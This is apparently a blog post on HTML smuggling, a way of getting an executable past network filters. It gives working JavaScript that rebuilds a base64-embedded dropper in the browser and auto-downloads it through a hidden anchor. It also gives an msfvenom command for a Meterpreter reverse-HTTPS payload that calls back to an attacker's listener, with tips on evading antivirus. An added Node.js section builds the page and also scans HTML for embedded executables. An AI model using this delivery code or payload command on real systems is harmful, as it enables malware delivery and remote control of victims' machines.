HTML Smuggling

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.



In many cases it is easy to spot a suspicious link or a suspect file, but what if the file downloads automatically? What if it arrives from a trusted site that has been compromised and tells the user "it's an update"? These are some of the dangers of HTML smuggling.


When the victim reads the email and visits the webpage, JavaScript on the page uses HTML smuggling to save the dropper file to disk automatically. The technique leverages the HTML5 anchor tag's download attribute, which tells the browser to save the link target as a file rather than navigate to it; when the page's script creates such a link and clicks it itself, the download starts as soon as the user lands on the page, with no further interaction.

Code Example


The first stage is to start a local Apache server and create a simple page containing an anchor tag with the download attribute set. When a user navigates to this page, the msfstaged.exe file is saved automatically to the user's default download directory (depending on the browser's download protections, the user may still see a warning for an executable file type).


The next step is to store the .exe inside the JavaScript so that it can be used with the download attribute. Ordinarily the attribute applies to a URL that the browser fetches from a web server, but it works equally well with a blob: object URL created from a Blob object, and a Blob can be built in the page from a byte array as shown below. This is the point of the technique: the executable crosses the network as base64 text inside the page and is only assembled into a file by the browser, so a proxy or gateway inspecting the HTTP response sees HTML and JavaScript rather than an executable download.


<html>
<body>
<script>
// Decode a base64 string into the raw bytes of the executable.
function base64ToArrayBuffer(base64) {
  var binary_string = window.atob(base64);
  var len = binary_string.length;
  var bytes = new Uint8Array(len);
  for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
  return bytes.buffer;
}

// The base64-encoded dropper (msfstaged.exe), truncated here.
var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAA/jgAAAAAAAAAAAAAAAAAAA...<SNIP!>';

// Rebuild the bytes in memory and wrap them in a Blob the browser can save.
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'application/octet-stream'});
var fileName = 'msfstaged.exe';

// Create a hidden anchor pointing at the Blob, mark it as a download and click it.
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>



The Payload


Payloads (the dropper) are easy to create with freely available tools and can be encoded in an attempt to evade antivirus; note that an unencoded msfvenom executable is widely signatured, so expect detection without further work. In this case I have used msfvenom. The command below specifies the payload to use, the local IP address of the listener waiting to hear back from the victim, and the local port the attacker's machine will listen on.


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.64 LPORT=443 -f exe -o /var/www/html/msfstaged.exe


The resulting executable is then base64-encoded and pasted into the file variable of the HTML page.
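The encoding step above, together with the matching check a defender can run, as an added example (Node.js) that is not part of the original post. buildSmugglingPage wraps a base64 string in the same anchor-download template as the snippet above, and inspectHtmlForSmuggling does what a mail gateway or proxy would have to do to catch it: look for the script markers and decode any long base64 literal to see whether it begins with the DOS "MZ" header. The payload bytes are a constructed 64-byte stub carrying only that header, not a real executable; the function names and the 64-character threshold are my own choices.

```javascript
// Added example, not from the original post. Runs under Node.js (uses Buffer).
// Offensive side: embed an executable in an HTML smuggling page.
// Defensive side: decode long base64 literals in a page and look for an MZ header.

// Constructed sample payload: the first 12 bytes of a DOS/PE header followed by
// zero padding, 64 bytes in total. Not a real executable; it only needs to
// start with "MZ" (0x4D 0x5A) for the check below to fire.
const SAMPLE_PAYLOAD = Buffer.concat([
  Buffer.from('MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00', 'latin1'),
  Buffer.alloc(52, 0),
]);

// Base64-encode the dropper and drop it into the same anchor-download template
// used in the post. fileName is the name the browser will save the file under.
function buildSmugglingPage(payloadBytes, fileName) {
  const b64 = Buffer.from(payloadBytes).toString('base64');
  return `<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
  var binary_string = window.atob(base64);
  var bytes = new Uint8Array(binary_string.length);
  for (var i = 0; i < binary_string.length; i++) { bytes[i] = binary_string.charCodeAt(i); }
  return bytes.buffer;
}
var file = '${b64}';
var blob = new Blob([base64ToArrayBuffer(file)], {type: 'application/octet-stream'});
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = ${JSON.stringify(fileName)};
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>`;
}

// Content check a gateway could apply to an HTML response or attachment.
// Returns which smuggling markers were seen and every base64 literal that
// decodes to bytes starting with "MZ". The 64-character minimum is an
// assumption to skip short identifiers; a real dropper is tens of kilobytes.
function inspectHtmlForSmuggling(html) {
  const markers = ['atob(', 'new Blob(', 'createObjectURL', '.download'];
  const markersFound = markers.filter((m) => html.includes(m));
  const embeddedExecutables = [];
  const base64Run = /[A-Za-z0-9+/]{64,}={0,2}/g;
  let match;
  while ((match = base64Run.exec(html)) !== null) {
    const bytes = Buffer.from(match[0], 'base64');
    if (bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a) {
      embeddedExecutables.push({ offset: match.index, decodedLength: bytes.length });
    }
  }
  return {
    markersFound,
    embeddedExecutables,
    // Flag only when the delivery code and an embedded executable are both present.
    suspicious: markersFound.length >= 3 && embeddedExecutables.length > 0,
  };
}

// Stand-alone run: build the page, then scan it.
const page = buildSmugglingPage(SAMPLE_PAYLOAD, 'msfstaged.exe');
console.log(JSON.stringify(inspectHtmlForSmuggling(page), null, 2));
```

Because the executable crosses the network as text inside the page, a filter that keys only on the Content-Type or file extension of HTTP downloads never sees it; the decode-and-check step is the part that matters. On the attacker side, `base64 -w0 /var/www/html/msfstaged.exe` on Linux produces the same single-line string that Buffer's base64 encoding does here.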



Video Example

